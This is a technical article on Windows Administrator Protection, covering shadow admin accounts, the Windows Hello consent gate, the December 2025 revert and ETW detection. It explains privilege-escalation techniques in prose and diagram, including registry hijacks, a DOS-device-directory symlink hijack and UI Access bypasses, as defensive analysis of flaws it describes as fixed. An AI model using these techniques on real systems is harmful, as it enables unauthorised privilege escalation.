Registry separation. The SMAA's HKCU maps to the SMAA's NTUSER.DAT, not the primary user's. When eventvwr.exe, running in an SMAA process, queries HKCU\Software\Classes\mscfile\shell\open\command, it reads the SMAA's hive, not the primary user's. The primary user has no write access to the SMAA's NTUSER.DAT. The entire registry-hijack family -- eventvwr / mscfile [@enigma0x3-2016-eventvwr], fodhelper / ms-settings, sdclt / IsolatedCommand [@enigma0x3-2017-sdclt], sdclt / App Paths [@enigma0x3-2017-app-paths] -- forecloses on the same property: the elevated binary's HKCU lookup walks a hive the attacker does not control [@ms-developer-blog-2025].

Logon-session separation. Every SMAA elevation gets a fresh authentication-ID LUID. The Local Security Authority allocates a new logon session for each elevation; when the elevated process exits, the session is reaped. Per-logon-session kernel resource caches, including the DOS device object directory at \Sessions\0\DosDevices\<LUID> and the credential cache, do not flow across the boundary. Token handles cannot be reused. Drive-letter overrides under the limited user's logon session do not appear in the SMAA's session [@forshaw-pz-jan2026].

No auto-elevation. The autoElevate=true manifest attribute is no longer honoured by appinfo.dll under TypeOfAdminApprovalMode = 2. Every elevation that previously went silent now prompts. The Windows Developer Blog states the change directly: "With administrator protection, all auto-elevations in Windows are removed and users need to interactively authorize every admin operation" [@ms-developer-blog-2025]. Forshaw's January 2026 framing of the consequence: "as auto-elevation is no longer permitted they will always show a prompt, therefore these are not considered bypasses" [@forshaw-pz-jan2026]. This is the single most consequential fix in the design. The auto-elevation whitelist was the bypass; removing the whitelist eliminates the class at the source, including the entire silent-elevation primitive class that Forshaw's older RAiProcessRunOnce research relied on.

Multi-user separation is the original UNIX privilege model. The `root` user holds privilege; ordinary users do not; the boundary between them is the file-permission system enforced by the kernel. Windows NT shipped the same primitives in 1993 -- discretionary access control lists on every securable object, per-user profiles, multi-user logon sessions -- but the surrounding culture treated Administrator-as-default as the path of least resistance. The architectural sophistication in Administrator Protection is in *linkage* (the SAM forward / back attributes), *lifecycle* (provisioning on policy enable, teardown on process exit), and *enforcement* (removal of auto-elevation as a mechanism). The primitives themselves are old.

The four fixes share a property. Each one breaks a shared resource that an attacker depends on. But there is one more piece of the redesign that has not yet been described: the prompt itself is no longer a Yes/No click-through. The next section asks what happens when the consent UI becomes a credential.

9. Windows Hello as the consent gate

The classic UAC prompt is a Yes / No on the secure desktop. Administrator Protection turns the prompt into a credential prompt for the primary user's Windows Hello: a PIN, a fingerprint, a face match, or a password fallback. The credential is for the primary user, not the SMAA, because the SMAA has no human credentials; the Hello verification is what authorises the cross-profile elevation [@ms-admin-protection, @ms-developer-blog-2025, @forshaw-pz-jan2026].

To talk precisely about what the gate does, name the primitive it closes. Under classic UAC, the consent prompt treated a click on the secure desktop as sufficient evidence of consent; physical presence was the entire evidence requirement. That primitive shows up in three sub-cases that the UAC literature has documented for two decades.

The primitive by which the legacy UAC consent dialog accepted a click on the secure desktop as sufficient evidence of consent, without verifying *who* clicked. Three operational sub-cases follow. *Unattended-session click-through* -- an attacker (or co-located third party) with brief physical access to an unlocked screen showing a UAC prompt clicks Yes on the presumption that whoever is at the keyboard is the legitimate user. *Habituated-click click-through* -- the legitimate user has clicked Yes on hundreds of UAC prompts and clicks one more without conscious attention. *Pretext click-through* -- a malicious application argues a legitimate-looking case to the user and elicits the Yes click. Administrator Protection's credential gate cost-raises all three sub-cases without fully eliminating any [@forshaw-pz-jan2026, @ms-admin-protection].

Unattended-session click-through. An attacker who walks up to an unlocked screen showing a UAC prompt can click Yes and elevate. The legitimate user has authenticated; the prompt assumes the person at the keyboard is the legitimate user. Post-AP, the click is not sufficient. The Hello biometric or PIN is required, and the attacker (who does not know either) cannot complete the gesture. Microsoft's Ignite 2024 framing addresses this primitive implicitly with "elevation rights only when needed" and "interactively authorize every admin operation" [@bleepingcomputer-2024].

Habituated-click click-through. A user who has clicked Yes on hundreds of UAC prompts over the course of a year clicks Yes on a malicious one as reflex. The classic UAC prompt requires no attentional engagement beyond physical presence and a click. Hello's gesture (a four-digit PIN entry, a fingerprint press, a face-recognition glance) is higher-friction and harder to perform inattentively. The Windows Developer Blog frames the property as "just-in-time administrator privileges, incorporating Windows Hello to enhance both security and user convenience" [@ms-developer-blog-2025].

Pretext click-through. A malicious application that argues its case to the user -- a fake installer, a re-skinned setup utility, a Trojan masquerading as a legitimate update -- can elicit a Yes click pre-AP. Post-AP, the user is also asked for a credential, which is a stronger user-side check. The user is more likely to interrogate "why am I being asked for my PIN again?" than "why is a prompt appearing?" Microsoft Learn captures the intent as "users are aware of potentially harmful actions before they occur, providing an extra layer of defense against threats" [@ms-admin-protection].

None of the three sub-cases is fully eliminated. Forshaw is explicit that visible-prompt bypasses are not classified as security vulnerabilities by Microsoft's design-document position: bypasses that result in a visible prompt are not security bulletins, because the user could equivalently have launched the prompt themselves [@forshaw-pz-jan2026]. What the gate does is cost-raise each sub-case. The unattended-screen attack requires a stolen PIN or coerced biometric. The habituated user must perform a gesture they cannot perform inattentively. The pretext attack must justify the second authentication, not just the first.

What it does not close is worth naming, because three primitives that look like they belong on the credential gate's account sheet were already closed by independent mechanisms, and the article should say so to avoid the common over-attribution mistake.

Synthetic-keystroke SendInput against consent.exe. Already closed by UIPI in Vista 2006, and doubly closed by the secure-desktop switch to Winsta0\Winlogon. Even UI Access processes -- whose purpose is to bypass UIPI for accessibility -- cannot reach into the secure desktop [@forshaw-pz-feb2026].
Headless UI Automation against the prompt. Same UIPI / secure-desktop boundary closes it. Redundant with respect to the credential gate.
CVE-2019-1388-class UI-interaction paths surfaced through the prompt's own UI. Closed by Microsoft's November 2019 HHCtrl patch and the cert-viewer UI redesign, prior to any Administrator Protection development [@nvd-cve-2019-1388].

The credential is hardware-rooted via TPM or Pluton on capable hardware. The PIN is unsealed only under the user's gesture; the biometric flows through Enhanced Sign-in Security (ESS) on capable hardware; the credential itself never leaves the Trusted Platform Module or Pluton enclave when ESS is engaged [@ms-windows-hello-ess]. The detail of the Hello architecture itself -- FIDO2 attestation, the ngc protector, the ESS isolation path through the Secure Kernel -- belongs to the Windows Hello article in this series, and is not re-derived here.

The new risk the gate does not close is the obvious one. Phishing the prompt now phishes a real credential, not just consent. A malicious application that can convince the user to authenticate on its behalf gets the elevation the user would otherwise have given to a legitimate request. The credential remains hardware-rooted and is not exfiltrated to the malware, but the elevation produces a working SMAA token in the attacker's process. This is the surface §15 carries forward to open problems.

Key idea: The credential gate closes one specific primitive: consent-without-identity-verification. It cost-raises three sub-cases (unattended-session, habituated-click, pretext click-through) without eliminating any. The structural boundary is profile separation plus fresh logon session plus auto-elevation removal; the credential gate is the fourth, defence-in-depth, property that ensures the boundary cannot be silently crossed by anyone holding only the limited user's physical access.

The prompt is a credential gate, but it remains a UI element. The next section asks how this elevation model compares to what other operating systems do.

10. Competing approaches: what other operating systems do

Three one-paragraph treatments. The article does not re-derive each system; it positions Administrator Protection against the field.

Linux: sudo plus PolKit pkexec plus PAM modules. The authority model on Linux is file-based. /etc/sudoers (or its LDAP equivalent) is the policy table; the sudoers plugin reads it and decides whether to permit a given user to run a given command [@sudo-ws-sudoers]. PolKit -- polkitd and its authentication-agent helpers -- is the parallel mechanism for GUI privileged-service requests, with actions and mechanisms separated in the polkit configuration files [@polkit-docs]. Biometric integration arrives through the PAM stack: pam_fprintd for fingerprint, pam_u2f for FIDO2 tokens, pam_yubico for Yubikeys. There is no profile separation by default; sudo -i switches HOME to root's home directory but does not separate per-elevation. The model is per-command authorisation, not per-account isolation.

macOS: Authorization Services plus Touch ID via pam_tid. GUI elevation prompts are gated by authorizationdb, a property-list-format policy database whose rules name which credentials (admin password, Touch ID, system-wide entitlements) authorise which actions [@apple-auth-services]. Touch ID is verified by the Secure Enclave Processor; the credential never leaves the SEP, and Authorization Services integrates with pam_tid to allow sudo invocations to use the gesture [@apple-pam-tid]. There is no separate admin profile; Transparency, Consent, and Control (TCC) guards privileged resource access at the per-action level, not the per-profile level. The Mac architecture privileges hardware-rooted consent (Touch ID, Secure Enclave) over account separation.

Microsoft's own sudo.exe (Windows 11 24H2). An inbox terminal transport that triggers the existing UAC or Administrator Protection pipeline; not an alternative to either [@ms-sudo-docs]. The forceNewWindow mode opens an elevated console in a new window. The disableInput mode keeps the elevated console in the current window but blocks keyboard input to it from the unelevated terminal. The normal (inline) mode preserves POSIX-style pipes between the unelevated and elevated processes. Microsoft Learn warns explicitly about the inline mode: "Sudo for Windows can be used as a potential escalation of privilege vector when enabled in certain configurations" [@ms-sudo-docs]. The mechanism is RPC between the unelevated and elevated sudo.exe processes; the elevation itself still goes through appinfo.dll.

Intune Endpoint Privilege Management (EPM). Cloud-policy-driven virtual-account elevation [@ms-epm-overview]. EPM performs elevation via a virtual account that is not a member of the local Administrators group; the elevation rights are conferred only for the duration of the policy-permitted action. Three elevation modes are available: Automatic (no user interaction), User-confirmed (a prompt), and Elevate as Current User (the action runs as the user's elevated identity rather than the virtual account). EPM is architecturally complementary to Administrator Protection: EPM is the enterprise policy story, Administrator Protection is the per-device architecture story. The two can coexist on the same device.

The distinguishing property of Administrator Protection in this comparison is whole-profile separation: the SMAA's own profile, the SMAA's own HKCU, the SMAA's own library folders, plus a fresh logon session per elevation. Neither Linux sudo nor macOS Authorization Services provides that property as a default desktop primitive. EPM provides per-elevation isolation via the virtual account but does not give the elevated process a persistent profile, which is what makes Administrator Protection's compatibility story so different from EPM's.

Administrator Protection is the architecturally tightest desktop elevation model now in production. The next section asks where the boundary still leaks.

11. Theoretical limits: what Administrator Protection cannot fix

Four structural ceilings.

Showing a prompt is not crossing the boundary. Microsoft's design position is explicit: bypasses that result in a visible elevation prompt are not security bulletins, because the user could equivalently have right-clicked "Run as administrator." Forshaw's January 2026 post states the position verbatim: "I expect that malware will still be able to get administrator privileges even if that's just by forcing a user to accept the elevation prompt" [@forshaw-pz-jan2026]. The operational consequence is that social-engineering the consent dialog remains a structural attack surface. The prompt is a UI element. The boundary is the credential gate. The gate is only as strong as the user's resistance to whatever pretext induces them to authenticate.

The MSRC servicing-criteria definition of a security boundary: a logical separation between code or data of different trust levels, intended to be enforced by the operating system and accompanied by a Microsoft commitment to issue a security update when an unauthorised crossing is found. UAC under the classic split-token model is classified as a *security feature*, not a boundary; bypasses receive quality-fix attention but not security-bulletin attention. Administrator Protection is the first elevation mechanism classified as a security boundary, with bulletin-grade fixes when it fails [@msrc-servicing-criteria, @forshaw-pz-jan2026].

Admin equals kernel. Once code is running inside an SMAA elevated process, it has the local Administrators group; it can write to HKLM; it can install services; it can load WHQL-signed drivers; it can call into kernel-mode interfaces gated by SeLoadDriverPrivilege and the App Control for Business policy. The MSRC servicing-criteria position that "admin-to-kernel is not a security boundary" continues to apply inside the SMAA [@msrc-servicing-criteria]. Administrator Protection makes the path to admin into a boundary; it does not change the relationship between admin and kernel. Driver-loading controls remain the domain of WHQL signing, the Microsoft Vulnerable Driver Blocklist (default-on in Windows 11 since the 2022 update), App Control for Business policies, and Hypervisor-protected Code Integrity (HVCI) [@ms-vuln-driver-blocklist]. The App Identity article in this series covers the App Control mechanism in detail.

The SMAA is in the local Administrators group. Discretionary access control list-based exposures of admin-only resources -- CREATOR OWNER ACEs on persistent objects, world-writable DACLs on certain \Sessions\0\DosDevices entries, default-permissive ACLs on a handful of legacy registry trees -- still grant the SMAA full access. The boundary is between standard user and SMAA, not between SMAA and SYSTEM. The SMAA is a high-privilege actor inside the operating system; the relationship between it and the rest of the privileged surface is unchanged.

Out of scope per Microsoft Learn. Remote logon, roaming profiles, backup-admin accounts, Managed Service Accounts and group Managed Service Accounts (MSAs and gMSAs), virtual accounts for services, and domain-admin scenarios are explicitly outside the Administrator Protection model in its current form [@ms-admin-protection]. The feature is local-machine-only, interactive-admin-only. Domain administrators who log into a workstation will not see the SMAA path; service accounts under LOCAL SERVICE, NETWORK SERVICE, or IIS_IUSRS are unaffected.

Key idea: A genuine architectural ceiling on consent-prompt elevation: the prompt is a UI element; the boundary is the credential gate; the gate is only as strong as the user's resistance to social engineering. Closing the gap requires out-of-band consent (smartcard, phone push) or per-action policy without human consent in the loop (EPM's automatic mode). Neither is the default.

Four limits, four sentences. The next section walks the concrete evidence of what actually leaked in the pre-GA Insider Preview builds, and what Microsoft did about it.

12. Forshaw's nine bypasses, classified

Between October 2024, when Administrator Protection first appeared in Insider Preview build 27718, and October 2025, when KB5067036 made the feature available on stable Windows, James Forshaw of Google Project Zero audited the mechanism and found nine separate silent-bypass paths. Microsoft fixed all nine -- either in the KB5067036 ship or in subsequent security bulletins [@forshaw-pz-jan2026]. The fact pattern is the structural confirmation that Administrator Protection is now treated as a security boundary. Under the UAC classification, none of those nine would have received CVEs. Each one would have been a quality bug. The bypass canon ran for twenty years without bulletins. The fact that the first cohort of Administrator Protection bypasses produced nine bulletin-eligible fixes is exactly the change in posture the classification change implies.

All the issues that I reported to Microsoft have been fixed, either prior to the feature being officially released (in optional update KB5067036) or as subsequent security bulletins. -- James Forshaw, *Bypassing Windows Administrator Protection*, Google Project Zero, January 26, 2026 [@forshaw-pz-jan2026]

Walk the nine as three classes.

The lazy DOS device directory hijack

The single most interesting vulnerability in the feature's history; Forshaw's January 26, 2026 deep analysis [@forshaw-pz-jan2026]; Project Zero issue 432313668 [@pz-issue-432313668]. The mechanism turns on a behaviour change Administrator Protection itself introduced. Every SMAA elevation gets a fresh logon session, which means the per-logon-session DOS device object directory at \Sessions\0\DosDevices\<LUID> is not created at SMAA logon time. The kernel routine SeGetTokenDeviceMap creates the directory lazily, on the first reference. The owner of the new directory is the owner of the access token that triggered the creation [@forshaw-pz-jan2026, @theregister-2026].

The impersonation level (`SecurityIdentification`) at which an impersonating thread can read security information about the impersonated token -- the SID set, the privilege set -- but cannot perform privileged operations or open kernel objects as the impersonated user. The kernel allows access checks to consult an identification-level token for *reading* the security information; certain code paths inadvertently use that information for *granting* operations, which is the structural primitive Forshaw's lazy DOS device directory exploit depends on [@forshaw-pz-jan2026].

The SECURITY_IMPERSONATION_LEVEL enumeration in winnt.h defines four levels in ascending order: SecurityAnonymous (value 0), SecurityIdentification (1), SecurityImpersonation (2), SecurityDelegation (3). SecurityIdentification is the second-lowest -- it sits one above SecurityAnonymous -- and is the level Windows uses when it wants to ask the kernel "what would this token be allowed to do?" without actually doing the operation. The trap is when a code path that runs as the caller uses an identification-level impersonation to read a token property -- here, the linked-token field -- and the resulting object inherits the caller's owner SID rather than the impersonated token's.

The exploit chain. An attacker running as the primary user (filtered token, Medium integrity) starts an elevation. Before the SMAA process touches its DOS device directory, the attacker impersonates the SMAA's TokenLinkedToken at identification level and triggers a code path that walks the directory. The kernel creates \Sessions\0\DosDevices\<SMAA_LUID> lazily; in the affected code path, the owner of the new directory becomes the attacker's primary token's owner SID rather than the SMAA's.

The attacker plants a C: symbolic link inside the directory pointing at an attacker-controlled location. When the elevated SMAA process loads its DLLs, the resolution walks \Sessions\0\DosDevices\<SMAA_LUID>\C: first; the symlink redirects the load to the attacker's directory; the attacker's DLL runs in the High-integrity SMAA process [@forshaw-pz-jan2026].

sequenceDiagram participant Att as Attacker (limited user) participant Kern as "Kernel (SeGetTokenDeviceMap)" participant SMAA as SMAA elevated process

Note over SMAA: Fresh logon session -- DOS device dir not yet created
Att->>Att: Impersonate SMAA TokenLinkedToken at Identification level
Att->>Kern: Reference \Sessions\0\DosDevices\<SMAA_LUID>
Kern->>Kern: Lazy-create directory
Note over Kern: Owner SID inherited from impersonating token
Att->>Kern: Create C: symlink under attacker control
SMAA->>Kern: Resolve C: at first DLL load
Kern-->>SMAA: Returns attacker symlink target
SMAA->>SMAA: Load attacker DLL at High integrity

What makes this bypass extraordinary is that it is caused by the feature's design. Pre-Administrator-Protection, the user's primary logon session was created at desktop logon and the DOS device directory existed before any elevation. Lazy directory creation never came up. The SMAA design's "fresh logon session per elevation" property -- the same property Forshaw's January 2026 pull-quote in §7 establishes via the credential-less LSA logon -- is exactly the precondition the lazy-creation path exploits.

Microsoft's pre-GA fix has two parts. First, the manifest-parsing access check uses the SYSTEM-impersonating-the-low-user identity rather than the user's primary token. Second, the DOS device directory is materialised with the correct owner before any user-controlled code path can trigger the lazy-creation path [@forshaw-pz-jan2026]. The Register's coverage of the disclosure noted "the most notable of the nine bugs he reported was a Logon Sessions flaw that relied upon five different Windows behaviors. He added that he likely only found it because he was previously familiar with the OS's 'weird behavior when creating the DOS device object directory'" [@theregister-2026].

The five UI Access bypasses

Forshaw's February 2026 post details the second class, comprising five of the nine bypasses [@forshaw-pz-feb2026]. UI Access is a token flag retrofitted in Vista to let accessibility applications cross UIPI. To qualify, an executable needs three things: a manifest declaring uiAccess="true", a trusted code-signing certificate, and an installation location under an administrator-only directory (typically %ProgramFiles%). The Application Information service's RAiLaunchAdminProcess endpoint launches qualifying UI Access processes without showing the consent prompt, on the theory that the three-criteria check is itself sufficient evidence of administrator approval [@forshaw-pz-feb2026].

The token flag (`TOKEN_UIACCESS`) that allows a process to interact with windows of higher integrity level than its own, bypassing User Interface Privilege Isolation. UI Access is meant for accessibility software (screen readers, on-screen keyboards) that needs to interact with elevated UI. To qualify, an executable must carry a `uiAccess="true"` manifest, a trusted code-signing certificate, and an administrator-only installation directory; qualifying processes run without showing the consent prompt and at integrity level High [@forshaw-pz-feb2026].

Under classic UAC, a UI Access process ran with the filtered standard-user token bumped from Medium to High integrity -- not with the full admin token. Forshaw's February 2026 post states the mechanism verbatim: "the service will take a copy of the caller's access token, enable the UI Access flag and increase the integrity level... If the caller is a limited user of an UAC administrator it will set the integrity level to High" [@forshaw-pz-feb2026].

Under Administrator Protection, the pre-GA design preserved that behaviour unchanged: the UI Access process inherited the limited user's primary token (not the SMAA's), bumped to High integrity. That decision was the structural flaw. A High-integrity process under the limited user can interact with the SMAA's windows whenever a High-integrity SMAA process exists on the same desktop, send messages to them, read clipboard data, and -- through GetProcessHandleFromHwnd -- obtain a process handle on the SMAA process that lets the limited-user process inject code into it.

The five UI Access variants exploit different sub-categories of the same structural property. The Quick Assist binary, a remote assistance application on Windows 10 and 11 that carries the uiAccess flag, is one such variant; R41N3RZUF477 published a public proof-of-concept that exploits the BrowserExecutableFolder group policy to make Quick Assist load WebView2 from an attacker-controlled directory [@quickassist-bypass]. The remaining four exploit, respectively, weaknesses in the secure-application-directory check, the manifest parsing routine, COM marshalling in UI Access contexts, and message-only window handling [@forshaw-pz-feb2026].

Microsoft's pre-GA fix is structural: UI Access processes no longer run as the limited user. They are created with a filtered copy of the SMAA's token (the SMAA's SID, the SMAA's profile, but with SeLoadDriverPrivilege and similar removed). Profile separation is restored at the cost of a more complex token-creation path [@forshaw-pz-feb2026].

The remaining three: implementation flaws

The third class -- three bypasses described by Forshaw only as "implementation flaws and long-standing UAC issues" -- is not detailed publicly [@forshaw-pz-jan2026]. The article does not invent details. Forshaw names the category and cites the framing; the engineering specifics are presumably in Microsoft Security Response Center advisories or are still under disclosure. What can be said is that two of the three appear from Forshaw's framing to be UAC-era bugs that Administrator Protection inherited rather than introduced, and one is an Administrator-Protection-specific implementation flaw.

The bypass canon ran for twenty years without bulletins. The fact that all nine pre-GA Administrator Protection bypasses received fixes -- including a deep one rooted in the feature itself -- is the structural confirmation that the elevation path is now a boundary. The next section asks why Microsoft pulled the feature in December 2025.

13. The compatibility surface and the December 2025 revert

About one month after KB5067036 made Administrator Protection available, Microsoft pulled it. Forshaw, writing in January 2026, gives the canonical attribution: "As of 1st December 2025 the Administrator Protection feature has been disabled by Microsoft while an application compatibility issue is dealt with. The issue is unlikely to be related to anything described in this blog post so the analysis doesn't change" [@forshaw-pz-jan2026]. Microsoft Learn confirms: "The feature previously listed in the October 2025 non-security update (KB5067036) has been reverted and will roll out at a later date" [@ms-admin-protection, @ms-kb5067036].The November 2025 KB5067036 amendment is worth knowing. Microsoft included an unrelated fix for an AutoCAD MSI-repair UAC-prompt regression in the same cumulative; that fix shipped and was not reverted. The WebView2 installer regression is what caused the Administrator Protection revert specifically [@ms-kb5067036].

The structural causes. The Windows Developer Blog (May 2025) [@ms-developer-blog-2025] enumerates the surface where applications break under the SMAA model.

Single sign-on does not cross. Domain and Microsoft Entra credentials cached for the primary user's session are not available inside the SMAA's session. Any elevated process touching Microsoft Graph, Entra ID, or Kerberos-protected resources must re-authenticate. The login dialogs an elevated installer triggers are not failures of the application; they are consequences of the separated logon session.
Network drives do not carry. Drive-mapping in the primary user's session is not inherited by the SMAA. Installers that mount network shares to install per-machine components break. The workaround for affected installers is to use UNC paths directly rather than drive letters.
Library folders diverge. Files saved to Documents, Desktop, Downloads, or Pictures from an elevated app land in C:\Users\ADMIN_<random>\ rather than the primary user's home. A user clicks Save in an elevated text editor and saves to "Documents"; from their own Explorer, the file is invisible.
HKCU diverges. Application settings -- theme, recent-files lists, per-user COM registrations, last-opened paths -- live in the SMAA's HKCU, not the primary user's. The canonical example in Microsoft's documentation is Notepad's dark-mode theme [@ms-developer-blog-2025]: the primary user sets the theme; an elevated Notepad opens in the default theme; the two sessions never agree.
WebView2 installers fail. The error message "Microsoft Edge can't read and write to its data directory" is the recognisable symptom of an installer that assumes one shared profile. The WebView2 runtime stores per-user state in AppData\Local\Microsoft\EdgeWebView\ under whichever profile is active at install time; if the runtime is installed under the SMAA's profile and then used by an unelevated application running as the primary user, the data-directory write fails. This is the regression that triggered the December 2025 revert.
Hyper-V and WSL incompatibilities. Microsoft Learn explicitly tells IT administrators not to enable Administrator Protection on devices that require Hyper-V or WSL [@ms-admin-protection].
Visual Studio. Microsoft's own development environment is "not supported in such a configuration" when run elevated. Extensions don't carry; settings don't carry; project-dialog paths point at the SMAA's profile rather than the developer's actual workspace.

Note: Microsoft Learn explicitly excludes Hyper-V and WSL devices from the recommended enablement set [@ms-admin-protection]. Symptoms of incorrect enablement include WSL distribution startup failures (the WSL service runs under a different account from the launching user, and the SMAA's logon-session-isolation properties interact badly with WSL's named-pipe communication) and Hyper-V Manager connection errors that are difficult to attribute to the elevation model.

I guess app compatibility is ultimately the problem here, Windows isn't designed for such a radical change. I'd have also liked to have seen this as a separate configurable mode rather than replacing admin-approval completely. -- James Forshaw, *Bypassing Windows Administrator Protection*, Google Project Zero, January 26, 2026 [@forshaw-pz-jan2026] Administrator Protection is the right architecture, and the compatibility surface is the bill of materials for twenty years of admin-as-default assumption. Application developers have written installer logic, theme-persistence code, drive-letter assumptions, and HKCU-shared state into shipping software for two decades, on the structural premise that the elevated process and the unelevated user share a profile. The December 2025 revert is the first iteration's learning round, not a structural failure. The same revert pattern accompanied the Windows Vista UAC rollout in 2006-2007, the Windows 7 auto-elevation introduction in 2009 (which itself softened the Vista prompt fatigue at the cost of the bypass canon), and the Smart App Control rollout in Windows 11 22H2. Microsoft will re-enable Administrator Protection when the WebView2 regression and a handful of installer-pattern fixes have shipped.

The architecture survives audit. The deployment is held back by twenty years of accumulated software assumptions. The next section asks what tools defenders now have that they did not have before.

14. The audit and detection surface

Every privileged operation on a device with Administrator Protection enabled now generates an ETW (Event Tracing for Windows) event in the Microsoft-Windows-LUA provider [@ms-admin-protection]. This is the first time the elevation pipeline itself is the source of a stable, operationally useful audit trail.

The basics.

Provider: Microsoft-Windows-LUA, GUID {93c05d69-51a3-485e-877f-1806a8731346}.
Event ID 15031: Elevation Approved.
Event ID 15032: Elevation Denied or Failed.

Each event carries the caller user SID, the application name and path, the elevation outcome, the SMAA used to host the elevation, and the authentication method (Hello PIN, biometric, password) [@ms-admin-protection]. The authentication method field records the primary user's Hello credential, not the SMAA's; the SMAA's authentication in step 6 of §7 is the credential-less LSA logon and has no method field of its own. The Microsoft Learn-documented logman invocation to capture the trace is short:

The Event Tracing for Windows provider that surfaces Administrator Protection elevation events. Provider GUID `{93c05d69-51a3-485e-877f-1806a8731346}`. Event ID 15031 marks an elevation that succeeded; Event ID 15032 marks an elevation that was denied or failed. Each event carries fields for the caller's SID, the application path, the elevation outcome, the SMAA used, and the authentication method [@ms-admin-protection].

{` // Pseudocode for a detection pipeline that reads ETW Event 15031 // (Administrator Protection elevation approved) and flags unusual // application paths per SMAA correlation key.

const allowList = new Set([ 'C:\\Windows\\System32\\mmc.exe', 'C:\\Windows\\System32\\regedit.exe', 'C:\\Windows\\System32\\cmd.exe', 'C:\\Program Files\\Microsoft VS Code\\Code.exe', ]);

function onEtwEvent(event) { if (event.provider !== 'Microsoft-Windows-LUA') return; if (event.id !== 15031) return;

const smaa = event.fields.shadowAccountName; const app = event.fields.applicationPath; const auth = event.fields.authenticationMethod; const user = event.fields.callerUserSid;

if (!allowList.has(app)) { emit({ severity: 'high', title: 'Unexpected elevation under Administrator Protection', smaa, app, auth, user, hint: 'Was the Hello prompt phished?' }); } } `}

Note: For detection engineers, the ADMIN_<random> name is the highest-value correlation key on the device. It is stable per primary admin (the SMAA name is created once and persists across elevations), distinct from the limited-user SID (the SMAA has its own SID, so user-by-SID correlations and SMAA-by-name correlations are independent axes), and present in every ETW 15031 / 15032 event. A detection rule that groups elevations by SMAA name and flags unexpected application paths is the canonical "someone phished a Hello prompt" alert pattern.

Defenders now have the audit trail they did not have under UAC. The next section asks what residual attack surface survives the SMAA architecture, the Hello gate, and the new audit trail.

15. Open problems: what survives

Five residual attack surfaces, each acknowledged in Microsoft's own documentation, Forshaw's Project Zero posts, or the operational literature on Windows privilege escalation.

The user is still the weak link. Every elevation depends on a human accepting the prompt. The Hello credential gate makes that human's decision more costly to fake than the classic Yes/No, but the gate does not change the fact that a successful prompt is a successful elevation. The three sub-cases of consent-without-identity-verification from §9 -- unattended-session, habituated-click, pretext click-through -- are cost-raised, not closed. Phishing-the-prompt remains a live attack surface and Microsoft does not classify it as a vulnerability [@forshaw-pz-jan2026]. Out-of-band consent -- a phone-push approval channel, a smartcard tap, a separate hardware key tap -- would close the gap; none of these is the Administrator Protection default.

Loopback authentication. The structural property that Windows services authenticate to themselves over the local network stack is independent of the SMAA model. SMB to localhost, Kerberos against the local machine account, NTLM challenge-response between processes on the same box -- these protocols predate UAC and are not changed by Administrator Protection. Forshaw's broader 2022 Kerberos research [@forshaw-2022-rbcd] catalogues the class. The NTLMless article in this series covers SMB signing, Extended Protection for Authentication (EPA), and channel binding mitigations that defenders should pair with Administrator Protection to close the loopback path.

Service-account SeImpersonatePrivilege. The Potato lineage of attacks (cataloged in the Access Control article in this series) runs in service accounts (IIS_IUSRS, LOCAL SERVICE, NETWORK SERVICE), not in interactive admin sessions. Administrator Protection scopes itself to interactive admin elevation; the Potato class is structurally out of scope.

Service-account Potato attacks run inside `IIS_IUSRS`, `LOCAL SERVICE`, and `NETWORK SERVICE` rather than in interactive admin sessions. The attacker has compromised a service that holds `SeImpersonatePrivilege`, then uses one of several primitives (the SSPI / NEGOEX dance, the EFS RPC interface, a printer-spooler endpoint) to coerce a higher-privileged service into authenticating against the attacker's local socket, and impersonates the resulting token. Administrator Protection's promise is around the *interactive elevation* path -- the flow from a logged-in user clicking an installer to an elevated process running. Potato is a separate problem class with its own mitigations: removing `SeImpersonatePrivilege` from service accounts that don't need it, applying EPA, and patching the named primitives one by one.

Driver loading once inside an SMAA elevation. Admin equals kernel applies once a process is running inside the SMAA. Vulnerable-driver loading, kernel-mode code execution, and rootkit installation fall under the §11 "admin equals kernel" ceiling -- WHQL signing, the Vulnerable Driver Blocklist, App Control for Business, and HVCI remain the four-mechanism mitigation surface, with the App Identity article in this series covering the App Control mechanism. Administrator Protection does not change the relationship between admin and kernel; it changes the relationship between standard user and admin.

The Hello credential phishing surface. The prompt now phishes a real credential rather than a click-through approval. A malicious application that successfully argues its case to the user gets a Hello gesture against the primary user's PIN or biometric. The credential remains hardware-rooted; ESS-engaged biometrics never leave the TPM or Pluton enclave; the malware does not learn the PIN. But the malware does get the elevation. The Windows Hello article in this series covers FIDO2 / ESS / PIN architecture hardening. Defender-side mitigation is the ETW 15031 / 15032 detection rule set on unexpected application paths [@ms-admin-protection].

The boundary is real, the audit trail is new, and the five-class residual surface is the next decade of work. The next section turns to operator-side practicalities.

16. Practical guide

Six tips, each tied to one Microsoft Learn or Windows Developer Blog primary source. Remember that, as of December 2025, Microsoft has reverted the rollout and the feature is currently disabled on stable Windows; the guidance below applies once Microsoft re-enables it. The Spoiler below contains the verbatim commands.

Enable. Set TypeOfAdminApprovalMode = 2 via Group Policy ("User Account Control: Configure type of Admin Approval Mode" -> "Admin Approval Mode with Administrator Protection") or via the Intune Settings Catalog OMA-URI. A reboot is required for the new policy to take effect [@ms-admin-protection, @ms-kb5067036].
Verify. Run whoami in an elevated console. The profile name shows ADMIN_<random>. Run whoami /priv to confirm the SMAA has the Administrators group enabled [@ms-admin-protection, @call4cloud-osint].
Capture. Start the ETW trace with the documented logman invocation; filter for Event IDs 15031 and 15032 [@ms-admin-protection]. The provider GUID is stable across builds.
Do not enable on devices that require Hyper-V or WSL. Re-evaluate when Microsoft re-enables the broad rollout [@ms-admin-protection, @forshaw-pz-jan2026].
For application developers, follow the Windows Developer Blog (May 19, 2025) guidance [@ms-developer-blog-2025]: install per-user packages unelevated; use %ProgramFiles% (and accept the elevated install path); avoid context switching during install; avoid sharing files between elevated and unelevated profiles; remove auto-elevation dependencies. The auto-elevation manifest attribute is no longer honoured under Administrator Protection, so any installer that relied on silent elevation needs to be reworked.
For IT admins on already-enabled devices broken by an elevated install: disable Administrator Protection temporarily, reinstall the application unelevated, then re-enable [@ms-developer-blog-2025].

Enable via Group Policy registry value (administrator console, persists across reboots):

# Set TypeOfAdminApprovalMode to 2 (Admin Approval Mode with Administrator Protection)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v TypeOfAdminApprovalMode /t REG_DWORD /d 2 /f
# Reboot required:
shutdown /r /t 0

Capture the elevation event trace:

logman start AdminProtectionTrace -p {93c05d69-51a3-485e-877f-1806a8731346} -ets
:: After some elevations:
logman stop AdminProtectionTrace -ets
